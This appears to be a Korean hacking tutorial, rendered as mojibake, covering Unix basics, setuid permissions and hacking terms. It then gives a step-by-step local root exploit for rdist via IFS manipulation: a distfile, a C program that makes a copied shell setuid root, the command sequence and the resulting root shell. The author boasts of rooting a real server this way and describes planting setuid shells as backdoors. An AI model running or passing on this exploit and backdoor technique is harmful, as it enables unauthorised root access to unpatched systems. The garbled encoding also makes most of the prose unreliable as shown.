ÇØÅ·°ú º¸¾È (¥±)

ÀÌ Àç ¿í : salsari@hotmail.com

1. ½ÇÀü ÇØÅ·¿¡ µé¾î°¡±â Àü¿¡

ÀÚ. ÀÌÁ¦ºÎÅÍ´Â ½ÇÀü¿¡ µé¾î°£´Ù. ±× µ¿¾È ÀÎÅͳÝÀ̳ª À¯´Ð½º´Ï ¸Ó¸®°¡ Á¶±Ý ¾ÆÆÍÀ»²«µ¥¡¦.
¾ÆÈå~ ±× À̷еéÀÌ ¹ÙÅÁÀÌ µÇ¾î¾ßÁö¸¸ ÀÌ ³»¿ëµéÀ» ÀÌÇØÇÒ ¼ö ÀÖÀ» °ÍÀÌ´Ù. ½ÇÀü¿¡ µé¾î°¡±â Àü¿¡ ¾Ë¾ÆµÎ¾î¾ß ÇÒ ¿ë¾îµé°ú À¯´Ð½º »ç¿ë¹ý¿¡ ´ëÇØ ¼³¸íÇÒÅÙµ¥.. Àß µû¶ó ¿À½Ã±â¸¦.
COME COME COME BABY!!

1.1 À¯´Ð½º ÀÌÇØÇϱâ

ÇØÅ·Àº ½ÇÀüÀÌ´Ù. ±×·¯¹Ç·Î ³ª´Â ¿©·¯ºÐµéÀÇ ÄÄÇ»ÅÍ¿¡ ¸®´ª½º¸¦ ¼³Ä¡Çϰųª ¿©À¯°¡ ÀÖ´Ù¸é °èÁ¤À» Çϳª ¾ò¾î À¯´Ð½º¿¡ ´ëÇØ °øºÎÇϱ⸦ ÃßõÇÑ´Ù. À̰͵µ Àú°Íµµ ¿©ÀÇÄ¡ ¾Ê´Â´Ù¸é À¯´Ð½º¸¦ ¸¶À½²¯ ¾²¸é¼­ ÇØÅ·À» ¹è¿ï ¼ö ÀÖ´Â °÷À» ¼Ò°³ÇÒ±î ÇÑ´Ù. (À¯°¨½º·´°Ôµµ ¸î¸î ±â´ÉÀº »ç¿ëÇÏÁö ¸øÇÑ´Ù..) - °èÁ¤À» °¡Áö°í Àְųª ¸®´ª½º¸¦ »ç¿ëÇÏ°í ÀÖ´Â ºÐµéµµ ÇÑ ¹ø °¡º¸½Ã¶ó.

ÇØÄ¿Áî·¦ - ÇØÅ·ÀÚÀ¯Áö´ë
[ http://www.hackerslab.org ]

°ü·Ã »çÇ×µéÀº ÇØÄ¿Áî·¦ ȨÆäÀÌÁö¸¦ ÂüÁ¶Çϼ¼¿ä.

- ½© (shell)
½©Àº Ä¿³Î(Kernel)°ú ¸í·É¾î(Command)»çÀÌ¿¡ ÀÖÀ¸¸ç »ç¿ëÀÚ°¡ ÁöÁ¤ÇÑ ¸í·ÉµéÀ» Çؼ®ÇÏ¿© Ä¿³ÎÀÌ Ã³¸® ÇÒ ¼ö ÀÖµµ·Ï Àü´ÞÇØÁÖ´Â Á߰迪ÇÒÀ» ÇÏ´Â ÀÏÁ¾ÀÇ ¸í·É¾îÀÌ´Ù.

- ÇÁ·Î¼¼¼­ (process)
½ÇÇàµÇ´Â ÇÁ·Î±×·¥°ú ±×¿¡ °ü°èµÇ´Â Á¤º¸¸¦ ¸»ÇÑ´Ù.


- ·Î±×ÀΠȤ ·Î±ä(Login)
À¯´Ð½º´Â ¿©·¯»ç¶÷ÀÌ »ç¿ëÇϱ⠶§¹®¿¡ ÀÚ½ÅÀÇ ·Î±×Àθí°ú Æнº¿öµå¸¦ ¾Ë¾Æ¾ßÁö¸¸ Á¢¼ÓÇÏ¿© ±× ÀÚ¿øµéÀ» »ç¿ëÇÒ ¼ö ÀÖ´Ù. - ÄÄÇ»ÅÍ¿ÍÀÇ ½ÇÁúÀûÀÎ ¿¬°á°úÁ¤

Trying 255.255.255.254...
Connected to jungmin.org.
Escape character is ¡®^]¡¯.

SunOS 5.6

login: salsari # ·Î±×Àθí - salsari¶ó°í ÀÔ·Â
Password: # Æнº¿öµå(È­¸é¿¡ ³ªÅ¸³ªÁö ¾Ê´Â´Ù.) - Æнº¿öµå ÀÔ·ÂÇÏÀÚ.
Last login: Fri Oct 8 19:17:37 from salsari.org # Æнº¿öµå°¡ ¸ÂÀ¸¸é ·Î±×ÀÎ µÇÁö¸Ó..
Sun Microsystems Inc. SunOS 5.6 Generic August 1997
You have mail.
jungmin% # ½©ÀÌ ¶¹´Ù. Á¢¼Ó ¿Ï·á

- ·Î±×¾Æ¿ô(logout)
À¯´Ð½º ½Ã½ºÅÛ »ç¿ëÀ» ³¡³»°í ½ÍÀ»¶§, ±× ½Ã½ºÅÛÀ¸·ÎºÎÅÍ ºüÁ®³ª¿À´Â °úÁ¤

% ^d  # Ctrl+d (¶§·Ð Ctrl + d ¸¦ ¸·¾ÆµÐ ½Ã½ºÅÛµµ ÀÖ´Ù. ±×·² ¶©  logoutÀ» ÀÔ·ÂÇÏÀÚ.)
Connection closed by foreign host.

- bash ¿Í csh ÀÇ Â÷ÀÌÁ¡
·Î±×Àνà ¡®$¡¯ ȤÀº ¡®%¡¯ ¿Í °°Àº ½©ÀÌ ¶ã°ÍÀε¥ ÀüÀÚ°¡ bash(sh) ÀÌ°í ÈÄÀÚ°¡ csh(tcsh) ÀÌ´Ù. µÑ ´Ù »ç¿ëÀº ºñ½ÁÇÏÁö¸¸ ¾à°£ÀÇ Â÷ÀÌ°¡ Á¸ÀçÇÑ´Ù. °£´ÜÇÏ°Ô Â¤¾îº¸ÀÚ¸é

path ¼³Á¤¿¡ ´ëÇؼ­...
bash(sh) : export PATH=¡±.:/bin:/usr/bin¡±
csh : set path = (. /bin /usr/bin)

- System V ¿Í BSD À¯´Ð½ºÀÇ Â÷ÀÌÁ¡
À̵鵵 bash¿Í cshÀÇ Â÷ÀÌó·³ »ç¿ëÇÏ´Â µ¥¿¡´Â Å©°Ô ´Ù¸¥ °ÍµéÀº ¾ø´Ù. ¸í·É¾î ü°è°¡ Ư¡ÀûÀ¸·Î Àú¸¶´Ù Á¶±Ý¾¿ ´Ù¸¦»ÓÀÌ´Ù. ¿ª½Ã °£´ÜÇÏ°Ô Â¤¾îº¸ÀÚ.


System V

% ps -ef # % : csh - solaris ¿¡¼­ ½ÇÇà
UID PID PPID C STIME TTY TIME CMD

 

BSD $ ps -aux # $ : bash - linux ¿¡¼­ ½ÇÇàÇÏ¿´´Ù. USER PID %CPU %MEM SIZE RSS TTY STAT START TIME COMMAND bin 163 0.0 0.6 900 384 ? S Sep 14 0:00 portmap news 362 0.0 1.8 1668 1160 ? S Sep 14 0:01 /usr/sbin/innd -p4 -r news 377 0.0 0.4 872 280 ? S Sep 14 0:00 /usr/lib/news/bin/ove news 403 0.0 0.9 1244 616 ? S Sep 14 18:05 sh /usr/lib/news/bin/ nobody 20717 0.0 1.0 1180 684 ? S 17:05 0:00 httpd ¡¦¡¦

 

root 0 0 0 8¿ù 05 ? 0:12 sched
root 1 0 0 8¿ù 05 ? 4:22 /etc/init -
root 2 0 0 8¿ù 05 ? 0:08 pageout
root 3 0 1 8¿ù 05 ? 648:44 fsflush
root 482 1 0 8¿ù 05 ? 0:00 /usr/lib/saf/sac -t 300
root 401 1 0 8¿ù 05 ? 0:00 /usr/lib/power/powerd
¡¦¡¦

- Æ۹̼Ç(permission)
È­ÀÏÀÇ Á¢±Ù Çã°¡¸¦ ³ªÅ¸³½ °Í.

¿¹¸¦ º¸ÀÚ.

% ls -l # dosÀÇ dir°ú °°Àº ±â´É
drwxr-xr-x 2 salsari users 512 10¿ù 8ÀÏ 19:18 .
drwxr-xr-x 194 root other 3584 10¿ù 4ÀÏ 10:57 ..
-rwx------ 1 salsari users 0 10¿ù 8ÀÏ 19:27 kkk
-rw-rw-rw- 1 salsari users 8 10¿ù 8ÀÏ 19:22 kkk1
-rwxrwxrwx 1 salsari users 29836 10¿ù 8ÀÏ 19:28 salsari.hwp
   

¹®ÀÚ   ÀÇ¹Ì           ¸ðµå °ª         ÀÇ¹Ì d       µð·ºÅ丮      400             User (owner) Àбâ (r) r        Àб⠠          200             User ¾²±â (w) w       ¾²±â           100              User ½ÇÇà (x) x       ½ÇÇà            040             Group Àбâ -       ºÒ°¡´É         020             Group ¾²±â                           010              Group ½ÇÇà                           004              Other ÀÐ±â                           002              Other ¾²±â                           001              Other ½ÇÇà

 

¹®ÀÚ¿Í ¸ðµå °ªÀ» ¾Ë¾Æ µÎ°í permission ÀÌÇØ ´Ü°è¿¡ µé¾î°¡ÀÚ.

¸ðµÎ [-] ÀÇ °¹¼ö´Â 10°³ÀÌ´Ù. (Àß ¸ð¸£°ÚÀ¸¸é ¼¼¾î º¸ÀÚ. ºÐ¸í 10Ä­ÀÏ °ÍÀÌ´Ù. ^^)
ù Ä­ÀÌ [-] À̸é ÀÏ¹Ý ÆÄÀÏ, [d] ÀÌ¸é µð·ºÅ丮ÀÓÀ» ¾Ë¾ÆµÎÀÚ.
´ÙÀ½ 9Ä­Àº ¼¼ Çʵå·Î ³ª´· ¼ö ÀÖ´Ù.
---/---/--- : [/]¸¦ ±âÁØÀ¸·Î ù ¹ø° Çʵ尡 user(¼ÒÀ¯ÁÖ), µÎ ¹ø° Çʵ尡 group(±×·ì) ¼¼ ¹ø° Çʵ尡 other(±âŸ »ç¿ëÀÚ)ÀÇ ¸ðµåÀÌ´Ù.
±×·³ °¢ ÇʵåÀÇ Ã¹ Ä­ÀÌ Àбâ(Read), µÎ ¹ø° Ä­ÀÌ ¾²±â(Write), ¼¼ ¹ø°°¡ ½ÇÇà(eXecution)ÀÌ´Ù. À§ÀÇ Ç¥·Î µûÁöÀÚ¸é ¸ðµå °ªÀÌ Àбâ(r)´Â 4, ¾²±â(w)´Â 2, ½ÇÇà(x)Àº 1 ÀÌ´Ù.
¿ª½Ã³ª ÀÌÇØ°¡ Àß °¡Áö ¾ÊÀ» ²¨¶ó ¹Ï´Â´Ù.. --; È®½ÇÇÑ ¿¹¸¦ º¸ÀÚ.

user Àбâ + user ¾²±â + user ½ÇÇà + group Àбâ + other ½ÇÇà
r + w + x + r + x = rwxr----x
400 + 200 + 100 + 40 + 1 = 741

ÀÌÁ¦ ¾Ë°ÚÂî?... ²À ±â¾ïÇØ µÎÀÚ. ±×·³ ÇÑ ¹ø Æ۹̼ÇÀ» ÀÐ¾î º¼±î³ª?

drwxr-xr-x 2 salsari users 512 10¿ù 8ÀÏ 19:18 .
# ÇöÀç µð·ºÅ丮
drwxr-xr-x 194 root other 3584 10¿ù 4ÀÏ 10:57 ..
# ºÎ¸ð µð·ºÅ丮
¼ÒÀ¯ÁÖ´Â Àаí, ¾²°í, ½ÇÇàÇÒ ¼ö ÀÖ°í ±×·ì, ±âŸ»ç¿ëÀÚ´Â ÀÐ°í ½ÇÇุ ½Ãų ¼ö ÀÖ´Â µð·ºÅ丮¸¦ ¶æÇÑ´Ù. [.]Àº ÇöÀç µð·ºÅ丮, [..]Àº ºÎ¸ðµð·ºÅ丮¸¦ ³ªÅ¸³½´Ù.(¸ðµå°ª 755)

-rwx------ 1 salsari users 0 10¿ù 8ÀÏ 19:27 kkk
½ÃÀÛÀÌ [-] À̹ǷΠÀÏ¹Ý ÆÄÀÏÀÓÀ» ¾Ë ¼öÀÖ´Ù.

-/rwx/---/--- À̹ǷΠ¼ÒÀ¯ÁÖ¸¸ Àаí, ¾²°í, ½ÇÇàÇÒ ¼ö ÀÖ´Ù.(¸ðµå°ª 700)

-rw-rw-rw- 1 salsari users 8 10¿ù 8ÀÏ 19:22 kkk1
ÀÏ¹Ý ÆÄÀÏ, ¼ÒÀ¯ÁÖ, ±×·ì, ±âŸ »ç¿ëÀÚ ¸ðµÎ ÀÐ°í ¾µ ¼ö ÀÖ´Ù.(¸ðµå°ª 666)

-rwxr-xr-x 1 salsari users 29836 10¿ù 8ÀÏ 19:28 salsari.hwp
ÀÏ¹Ý ÆÄÀÏ, ¼ÒÀ¯ÁÖ´Â ÀÐ°í ¾²°í ½ÇÇàÇÒ ¼ö ÀÖ´Ù. ±×·ì, ±âŸ »ç¿ëÀÚ´Â ÀÐ°í ½ÇÇุ ½Ãų ¼ö ÀÖ´Ù.

-Set user id
ÆÄÀϵéÀ» »ìÇÇ´Ù º¸¸é ¡®-rws--x--x¡¯ ¿Í °°Àº user ½ÇÇàÀÚ¸®¿¡ s ¶ó°í Ç¥½ÃµÇ¾î ÀÖ´Â °ÍÀ» °£È¤ º¸°Ô µÉ °ÍÀÌ´Ù. ÀÌó·³ user ½ÇÇà ÀÚ¸®¿¡ s°¡ ºÙ¾î ÀÖ´Â °ÍÀ» setuid(set user id)¶ó°í Çؼ­ ÀÌ ÆÄÀÏÀ» ½ÇÇà½ÃÅ°´Â µ¿¾È ±× ÆÄÀÏÀÇ user(¼ÒÀ¯ÀÚ)ÀÇ ±ÇÇÑÀ» °¡Áö°í È°µ¿ÇÑ´Ù´Â ¶æÀÌ´Ù. ±×·³ ÀÌ·± ÆÄÀÏÀÇ Àǹ̴Â?
¿ìÈ÷È÷~~~ ´ÙÀ½ ¿¹¸¦ º¸ÀÚ.

-r-sr-xr-x 3 root root 88620 1999³â 9¿ù 15ÀÏ bash
ÆÄÀϸíÀÌ bash... ½©ÀÓ¿¡ Ʋ¸²¾øÀ»²¨¾ß. ¼ÒÀ¯ÀÚ´Â root, setuid°¡ ºÙ¾î ÀÖ±¸¸¸... ±×·³ ÀÌ ÆÄÀÏÀ» ½ÇÇà½ÃÅ°¸é ´©±¸³ª rootÀÇ ±ÇÇÑÀ» °¡Áú ¼ö ÀÖ´Ù´Â ¶æÀÌ µÇ´Â±º.. ³Ê¹« ÁÁÁö ¾ÊÀº°¡? Àú ÆÄÀϸ¸ ½ÇÇà½ÃÅ°¸é ¿©·¯ºÐµéÀÌ root°¡ µÈ´Ù´Ï.. ¾öû³­ ½ÅºÐ»ó½ÂÀε¥...
º¸Åë ÇØÅ·ÈÄ ½©À» /usr/bin °ú °°Àº µð·ºÅ丮¿¡ À̸§À» ¹Ù²ã¼­ º¹»ç½ÃŲÈÄ setuid¸¦ °É¾î¼­ ¹éµµ¾î·Î »ç¿ëÇÑ´Ù.

        ¸ðµå °ª      ÀÇ¹Ì                  ºñ°í
        4000         Set user id
        2000         Set group id
        1000         Sticky bit           °øÀ¯¸ðµå

Sticky bit¿Í °°Àº °ÍÀº /tmp µð·ºÅ丮¿¡ ¸¹ÀÌ »ç¿ëµÈ´Ù.

drwxrwxrwt 2 root root 512 11¿ù 8ÀÏ 11:11 temp

¿¹¿¡¼­ º¸°Çµ¥ ´©±¸³ª /tmp ¹æ¿¡ ÆÄÀÏÀ̳ª µð·ºÅ丮¸¦ ¸¸µé°í Áö¿ï ¼ö ÀÖÁö¸¸ Á¤ÀÛ Áö¿ï ¼ö ÀÖ´Â °ÍÀº ¼ÒÀ¯ÁÖ°¡ ¿©·¯ºÐµé·Î µÇ¾î ÀÖ´Â ÆÄÀÏ°ú µð·ºÅ丮»ÓÀÌ´Ù. (ÈåÈå.. ¾ÈŸ±õÁö..) Àý´ë·Î ´Ù¸¥ »ç¶÷µéÀÌ ¸¸µç ÆÄÀÏÀ» Áö¿ï¼ø ¾ø´Ù. - ±×·¡¼­ °øÀ¯¸ðµå¶ó³×..

- ¸®´ÙÀÌ·º¼Ç/ÆÄÀÌÇÁ(|)

> file : ½ÇÇà °á°ú°¡ file¿¡ µé¾î°£´Ù.
>> file : ½ÇÇà °á°ú°¡ file¿¡ Ãß°¡µÈ´Ù.
< file : ÀԷ°ªÀ¸·Î file2 ³»¿ëÀÌ µé¾î°£´Ù.
<< kkk : kkk¹®ÀÚ¿­ÀÌ ³ªÅ¸³ª¸é ÀÔ·ÂÀÌ ÁߴܵȴÙ.

> ¿©·¯ºÐµéÀÌ Á÷Á¢ ÇغÁ¾ß µÉ »çÇ×
% cat > kkk # ÀÔ·ÂÀ» ¸¶Ä¥¶§´Â ^D(Ctrl + D)¸¦ ÀÔ·ÂÇÏÀÚ.
% cat >> kkk
% cat < kkk

ÆÄÀÌÇÁ(|)´Â ÀÏÁ¾ÀÇ ÇÊÅÍ ¿ªÈ°À» ÇÑ´Ù.
file | file1 : fileÀÇ °á°ú°ªÀÌ file1ÀÇ ÀÔ·ÂÀ¸·Î »ç¿ëµÈ´Ù.

> ½ÇÇàÇغ¸¸é ÁÁÀ» °Í
% ps -ef | grep root

> ±âŸ ÀÚ¼¼ÇÑ À¯´Ð½º ¸í·É¾î´Â »ý·«ÇÕ´Ï´Ù.. ^^;
( »ý·«ÇÏ´Â ÀÚÀÇ ±Ã»öÇÑ º¯¸í - °øºÎÇϼ¼¿ä! °øºÎ!! (-.- )( -.-) )


1.2 ÇØÅ·¿¡ ´ëÇؼ­ ¾Ë¾ÆµÎ¾î¾ß ÇÒ ¿ë¾îµé

bug : ¼Ò½ºÆÄÀϵ鳻ÀÇ Ä¡¸íÀûÀÎ ¹®Á¦Á¡.
hole : °ø°Ý´ë»óÀÌ µÉ¸¸ÇÑ ¹ö±×³ª ·çƾ
packet : µ¥ÀÌÅ͵éÀ» Á¶°¢³½ µÚ ±×¿¡ °ü·ÃµÈ °¢Á¾ Á¤º¸¸¦ µ¡ºÙÀÎ µ¥ÀÌÅÍÅë½ÅÀÇ ±âº»´ÜÀ§
backdoor : µÞ¹®, °³±¸¸Û
attack : °ø°Ý, ħÀÔ
local host : ÇöÀç »ç¿ëÇÏ°í Àִ ȣ½ºÆ®
remote host : ¿ÜºÎ·Î ¶³¾îÁ® Àִ ȣ½ºÆ®
vulnerability : º¸¾È Ãë¾àÁ¡À» ÀÚ¼¼ÇÏ°Ô º¸¿©ÁÖ´Â º¸°í¼­
Advisory : ÇØÅ·°¡´ÉÇÑ ¿©·¯ ¹ö±×³ª ·çƾµé¿¡ ´ëÇÑ ¹®Á¦Á¡°ú ÇØ°áÃ¥À» ¾Ë·ÁÁÖ´Â º¸°í¼­
Exploit : ½Ã½ºÅÛ º¸¾È Ãë¾àÁ¡ ÀÌ¿ë

1.3 ÇØÅ·ÀÇ Á¾·ù


ÇØÅ·Àº Å©°Ô ¼¼ °¡Áö ¹æ½ÄÀ¸·Î ³ª´­ ¼ö ÀÖ´Ù.

- Local attack
remote attackÀ¸·Î °ø°Ý ½Ã½ºÅÛ¿¡ ÀáÀÔÇÑ Ä§ÀÔÀÚ°¡ rootÀÇ ±ÇÇÑÀ» ¾ò¾î³»±â À§ÇÑ °ø°Ý.
½Ã½ºÅÛ ³»ºÎ ÇÁ·Î±×·¥µéÀÇ ¹ö±×³ª ȯ°æ º¯¼öÁ¶ÀÛ, °æÀï¹æ½Ä, °ü¸®ÀÚ¿¡ ÀÇÇÑ ½Ã½ºÅÛÀÇ À߸øµÈ ¼³Á¤µîÀ» ÀÌ¿ëÇÑ´Ù.

- Remote attack
¿ÜºÎ·ÎºÎÅÍ ¶³¾îÁ® ÀÖ´Â »óÅ¿¡¼­ °ø°ÝÈ£½ºÆ®ÀÇ DaemonÀÌ °¡Áö°í ÀÖ´Â ¹ö±×³ª NIS/NFSµî ÀÇ À߸øµÈ ¼³Á¤, À¯Àúµé¿¡ °üÇÑ Á¤º¸µéÀ» °¡Áö°í °ø°ÝÇÏ´Â ¹æ½ÄÀ¸·Î ¿ÜºÎÀÇ Ä§ÀÔÀÚ°¡ ¸ñÇ¥ ½Ã½ºÅÛÀÇ shellÀ» ¾ò¾î³»´Â °ÍÀ» ±âº»Àû ¸ñÀûÀ¸·Î ÇÑ´Ù.

- DOS(Denial of Service)
¼­ºñ½º °ÅºÎ °ø°Ý. µÚ¿¡ ÀÚ¼¼ÇÏ°Ô ³ª¿Â´Ù.

 

2. Local attack

À½.. ¾î¶² °ÍµéºÎÅÍ »ìÆ캼±î? °ú°Å SunOs¸¦ È­·ÁÇÏ°Ô ¼ö ³õ¾Ò´ø rdist¸¦ »ìÆ캼±î³ª?
8lgm¿¡¼­ ³»³õ¾Ò´ø rdist ¹ö±×¿¡ ´ëÇÑ advisory¸¦ ÂüÁ¶Çϸ鼭 ÇÑ ¹ø »ìÆ캸ÀÚ
> Àá±ñ! ±×Àü¿¡
±×·³ rdist ÇØÅ·¿ø¸®´Â °ú¿¬ ¹«¾ùÀϱî? (¾î¶² ÇØÅ·ÀÌµç ¿ø¸®°¡ Á¸ÀçÇÔÀ» ±â¾ïÇ϶ó.) ±×°Ç ¹Ù·Î IFS ȯ°æº¯¼ö¸¦ Á¶ÀÛÇؼ­ root shellÀ» ¾ò¾î³»´Â °ÍÀÌ´Ù. ±×·³..

- IFS¶õ ¹«¾ùÀΰ¡?
IFS´Â Internal Field SeparatorÀÇ ¾àÀÚ·Î ¿ÜºÎÇÁ·Î±×·¥À» ½ÇÇàÇÒ ¶§ ÀԷµǴ ¹®ÀÚ¿­À» ³ª´­ ¶§ ±âÁØÀÌ µÇ´Â ¹®ÀÚ¸¦ Á¤ÀÇÇÏ´Â º¯¼öÀÌ´Ù.
±âº»ÀûÀ¸·Î IFS´Â °ø¶õ(Space)À¸·Î Á¤Àǵȴ٠- IFS=¡± ¡°
ÀÌ IFS¸¦ ½½·¯½¬[/]·Î ¹Ù²Ù°í ½Í´Ù¸é cshÀÎ °æ¿ì¿¡´Â setenv IFS / ,bashÀÎ °æ¿ì¿¡´Â export IFS=¡±/¡± ·Î ÇÏ¸é º¯°æµÈ´Ù. ÀÌÇظ¦ À§Çؼ­ °£´ÜÇÑ ¿¹¸¦ º¸ÀÚ.

$ cat > pwd1 # pwd1 ÆÄÀÏÀ» »ý¼º
#!/bin/sh # ½© ½ºÅ©¸³Æ® Á¤ÀÇ. bash(sh)¸¦ »ç¿ëÇÑ´Ù.
IFS=¡±/¡± # IFS¸¦ [/]·Î Á¤ÀÇ
export ¡®pwd¡¯ # pwd °á°ú ³»¿ëÀ» º¸¿©ÁØ´Ù.
^D  # ÀԷ¸¶Ä¡°í ÀúÀå

$ pwd  # ÇöÀç µð·ºÅ丮¸¦ Àý´ë °æ·Î·Î º¸¿©ÁØ´Ù.
/var/tmp
$ chmod 700 pwd1 # permissionÀ» ½ÇÇà°¡´É Çϵµ·Ï ¸¸µç´Ù.
$ pwd1 # ¿ì¸®°¡ ¸¸µç ½© ½ºÅ©¸³Æ® ½ÇÇà
var tmp # IFS¸¦ [/]·Î ¼³Á¤Ç߱⠶§¹®¿¡ var, tmp µÎ °³ÀÇ Çʵå·Î ³ª´µ¾î Áö°Ô µÇ´Â °ÍÀÌ´Ù.

IFS°¡ ÀÔ·ÂµÈ ´Ü¾îµéÀÇ separator·Î ÀÛ¿ëÇÏ¿© home, fox, ...µîÀÌ ÇϳªÀÇ ´Ü¾î·Î Àνĵǰí ÀÖ´Ù. ±×·³ ´ÙÀ½ ¿¹Á¦¸¦ »ìÆ캸ÀÚ. ¿©±â¿¡¼­ rdistÀÇ º¸¾È»ó ÇêÁ¡À» ¾Ë¾Æº¼ ¼ö ÀÖ´Ù.

% cat > distex
#!/bin/sh
IFS=¡±/¡±
export PATH
/bin/sh
^D

% ./distex
distex: bin: not found # binÀ̶ó´Â ½ÇÇàÆÄÀÏÀÌ ¾ø´Ù´Â ¸Þ½ÃÁö¸¦ º¸¿©ÁÖ°í ÀÖ´Ù.
bin

ÀÚ, ÀÌÁ¦ Â÷±ÙÂ÷±Ù ÇÑ ¹ø »ìÆ캸ÀÚ.

[8lgm]-Advisory-1.UNIX.rdist.23-Apr-1991 # 1991³â... ¿ª½Ã °íÀüÀ̶ó ÇÒ ¸¸ÇÏ´Ù. ±×Ä¡?

rdist(1) uses popen(3) to execute sendmail(8) as root.
It can therefore be made to execute arbitary programs as root.
# rdist ÇÁ·Î±×·¥Àº ÆÄÀÏÀ» ´Ù¸¥ ½Ã½ºÅÛÀ¸·Î ºÐ»ê½Ãų¶§ »ç¿ëµÈ´Ù
# rdist´Â ȯ°æ º¯¼öÀÎ IFS°¡ ¡®/¡¯·Î Á¤ÀǵǾî ÀÖ´Ù.
# rdist´Â ½ÇÇ൵Áß¿¡ popen(3)À» ÀÌ¿ëÇÏ¿© /usr/lib/sendmailÀ» ½ÇÇà½ÃŲ´Ù.
# IFS´Â exec()³ª popen()°°Àº ÇÔ¼ö¸¦ ÀÌ¿ëÇÑ´Ù.

Any user with access to rdist(1) can become root.
# rdist¸¦ ÀÌ¿ëÇؼ­ ¾î¶²À¯Àúµç root°¡ µÉ ¼ö Àִٴ±º..

# distfile À» ¸¸µé¾î ´ÙÀ½ ³»¿ëÀ» ´ãÀÚ.
HOSTS = localhost
FILES = BullInTheHeather
${FILES} -> ${HOSTS}
install /tmp/1 ;
notify user ;

# usr.c ÆÄÀÏÀ» ¸¸µé¾î ´ÙÀ½ ³»¿ëÀ» ´ãÀÚ.
main()
{
setuid(0);
chown(¡°sh¡±, 0, 0);
chmod(¡°sh¡±, 04755);
exit(0);
}

# ¿©±â¼­ºÎÅÍ´Â ½ÇÇà ¸ðµåÀÌ´Ù.

> % cp /bin/sh . # /bin/sh¸¦ ÇöÀç µð·ºÅ丮(.)¿¡ copy
> % cc -o usr usr.c # usr.c ÆÄÀÏÀ» ÄÄÆÄÀÏ ÇÏÀÚ.
> % set path=(. $path) # path - ÇöÀçµð·ºÅ丮¸¦ ÃÖ¿ì¼± °æ·Î·Î ÇÏÀÚ.
> % setenv IFS / # c shellÀÌ´Ù. IFS¸¦ / ·Î ¼³Á¤ÇÑ´Ù.
> % rdist # rdist¸¦ ½ÇÇàÇÏÀÚ.
updating host localhost
rdist: BullInTheHeather: No such file or directory
notify @localhost ( user )
> % ls -l
-rwsr-xr-x 1 root 106496 Mar 4 00:25 sh
# ¿Í¿ì~ root shellÀÌ ÇöÀç µð·ºÅ丮¿¡ »ý¼ºµÇ¾ú´Ù. ÇØÅ·¼º°ø!! ·çÆ® ȹµæ ¼º°ø!!
> % ./sh # ½©À» ½ÇÇà½ÃÅ°ÀÚ.


# (root shell) # ·çÆ®±ÇÇÑ È¹µæ


ÀÚ.. »ÑµíÇÑ°¡? ÀÌ ¹ö±×°¡ ¾ÆÁ÷ ÅëÇÏ´Â À¯´Ð½º ¼­¹öµéÀÌ ÀÖÀ»°ÍÀÌ´Ù. SunOS 4.1.2 ÀÌÀü ¹öÀüÀ» ¾²´Â °÷¿¡¼­ ÆÐÄ¡¸¦ ÇÏÁö ¾Ê¾Ò´Ù¸é ÀÌ ¹ö±×°¡ ¼º°øÇÒ °ÍÀÌ´Ù. - ÀÛ³âÀΰ¡? ³»°¡ ÀÌ ¹ö±×·Î ·çÆ®¸¦ ȹµæÇÑ ¼­¹ö°¡ ÀÖ¾ú´Âµ¥... Áö±ÝÀº ¾î´À ¼­¹øÁö ±â¾ïÀÌ °¡¹°°¡¹°ÇÏ´Ù.. (ºÒ°ú ÀÛ³âÀ̶ó±¸! ÇѽÉÇÑ °ü¸®ÀÚ¶ó¸é ÃæºÐÈ÷ ¸ÔÇôµç´Ù. ³ÄÇÏÇÏ~)

ÀÌ°°ÀÌ È¯°æ º¯¼ö(Environment Variable)¸¦ Á¶ÀÛÇÏ¿© ·çÆ®¸¦ ¾òÀ» ¼ö ÀÖÀ»»Ó¸¸ ¾Æ´Ï¶ó °æÀï Á¶°Ç(Race Condition)À» ÀÌ¿ëÇÒ ¼öµµ ÀÖ°í ½Ã½ºÅÛ °ü¸®ÀÚÀÇ ½Ç¼ö³ª À߸øµÈ ¼³Á¤À¸·Î º¸¾È¿¡ ±¸¸ÛÀÌ »ý±â´Â °æ¿ìµµ ÀÖ´Ù. ÀÌ °°Àº °æ¿ì´Â °ü¸®ÀÚµµ ¸ð¸£´Ï(ÀßÇß´Ù°í ¹Ï°í ÀÖÀ»°Ô »·ÇÏ´Ï..) ´õ Å« ¹®Á¦¸¦ ¹ß»ý½Ãų ¼öµµ ÀÖ´Ù. (º¸Åë ¹ö±×°¡ ¹ß»ýµÇ¸é ±×¸¦ ¼öÁ¤ÇÏ´Â ÆÐÄ¡°¡ ³ª¿À±â ¸¶·ÃÀÌ´Ù. ÇÏÁö¸¸ °ü¸®ÀÚÀÇ ½Ç¼ö·Î ±¸¸ÛÀÌ »ý°Ü³µÀ¸´Ï ÆÐÄ¡°°Àº °ÍÀÌ ÀÖÀ»¸® ¸¸¹«ÇÏ´Ù. - °ü¸®ÀÚÀÇ °ü½É°ú ÁÖÀÇ°¡ ÇÊ¿äÇÏ´Ù.)
ÇöÀç Local attackÀÇ ÃÖ´ë °ø°Ý¹æ¹ýÀÎ ¹öÆÛ ¿À¹öÇ÷οì(Buffer Overflow)µµ ÀÖ´Ù.

°æÀï Á¶°Ç ¹æ½Ä -
Àӽà ÆÄÀÏÀ» »ý¼ºÇÏ´Â ÇÁ·Î±×·¥¿¡¼­ ÀÚÁÖ »ç¿ëÇÑ´Ù. Àӽà ÆÄÀÏÀ» ¸¸µé¾î ¾²°í ÀÏÀÌ ³¡³µÀ¸¸é Áö¿ì´Â °úÁ¤¿¡¼­ ¾²±â ¹Ù·Î Á÷Àü °æÀïÁ¶°ÇÀ» ÀÌ¿ëÇÏ¿© ¿øÇÏ´Â ÆÄÀÏ¿¡ ¿øÇÏ´Â ³»¿ëÀ» Áý¾î³Ö´Â ¹æ½ÄÀÌ´Ù.

¹öÆÛ ¿À¹öÇ÷οì -
